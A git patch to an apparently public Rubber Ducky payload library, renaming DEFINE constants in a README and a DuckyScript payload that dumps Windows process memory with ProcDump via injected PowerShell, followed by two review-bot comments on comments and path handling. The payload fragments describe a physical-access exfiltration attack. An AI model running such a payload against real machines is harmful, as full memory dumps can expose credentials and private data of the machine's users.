From f143daa5183e8e141ea1500acc847d960b915bbf Mon Sep 17 00:00:00 2001
From: Aleff
Date: Sat, 1 Jun 2024 10:47:20 +0200
Subject: [PATCH] Redefined DEFINEtions from $ to #
---
.../Dump_Windows_Memory_Through_ProcDump/README.md | 4 ++--
.../Dump_Windows_Memory_Through_ProcDump/payload.txt | 7 +++----
2 files changed, 5 insertions(+), 6 deletions(-)
diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md
index 6c912f6..d8c2b6a 100644
--- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md
+++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md
@@ -34,8 +34,8 @@ To obtain all active process PIDs the tasklist command is used, which provides t
 1. Download ProcDump\[5].
 2. Move the extracted ProcDump folder or directly the executable, as you prefer, inside Rubber Ducky's memory.
-3. Then you have to change the variable `$WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`.
-4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `$PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`.
+3. Then you have to change the variable `#WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`.
+4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `#PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`.
 ## Read More
diff --git a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
index dd4dd1c..63282c8 100644
--- a/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
+++ b/payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
@@ -14,15 +14,14 @@ REM - Authorization to execute powershell commands
 REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
-DEFINE $WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
+DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
 REM Path to the EXE file stored in the usb, i.e. if 'F:\ProcDump\Procdump\procdump.exe' you must use '\ProcDump\Procdump\'
-DEFINE $PATH_TO_EXE \ProcDump\Procdump\
+DEFINE #PATH_TO_EXE \ProcDump\Procdump\
 REM Driver Label of your RubberDucky - Default: DUCKY
 DEFINE #DUCKY_DRIVE_LABEL DUCKY
-
 EXTENSION DETECT_READY
 REM VERSION 1.1
 REM AUTHOR: Korben
@@ -66,7 +65,7 @@ STRINGLN_POWERSHELL foreach ($i in $a){
 if ( $i -like '*PID*'){
 $i -match 'PID.\s+(.+)';
-".$PATH_TO_EXE$WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1];
+".#PATH_TO_EXE#WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1];
 }
 }
 exit;
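Review bot: The two REM lines above the renamed constants still say only which value to set, not that the leading `#` is what makes them compile-time constants; the patch title is the only place that records why `$` was dropped, and the next contributor editing this block has no comment telling them not to reintroduce it. Presumably a `$NAME` spelled inside the STRINGLN_POWERSHELL block would be read as a PowerShell variable rather than substituted, which is consistent with the existing `DEFINE #DUCKY_DRIVE_LABEL DUCKY` already using the `#` form. I would add one line next to the first definition, e.g. `REM Constant names must keep the leading '#': that is the DEFINE form the compiler substitutes, and a '$' name inside the PowerShell block below would be treated as a PowerShell variable instead (TODO confirm against the DuckyScript DEFINE docs)`. The same comment applies to the second hunk of this file, where the substituted string is built.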
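Review bot: The rewritten line builds the path as `".#PATH_TO_EXE#WHAT_EXE_DO_YOU_WANT_TO_USE.exe"`, which after substitution begins with `.\`, i.e. a path relative to the current working directory, while the README and the REM above `#PATH_TO_EXE` describe the value as a path under the Ducky drive (`F:\ProcDump\Procdump\` becomes `\ProcDump\Procdump\`); unless a part of the script outside this hunk first changes directory to that drive, the documentation and the code do not describe the same thing. I would state that assumption where the constant is defined, e.g. `REM #PATH_TO_EXE is joined to '.' in the PowerShell block, so it is resolved relative to the current directory — TODO confirm the script changes to the #DUCKY_DRIVE_LABEL drive before this point`. The STRINGLN_POWERSHELL block containing this line starts and ends outside the hunk, so I cannot tell from here whether that change of directory happens.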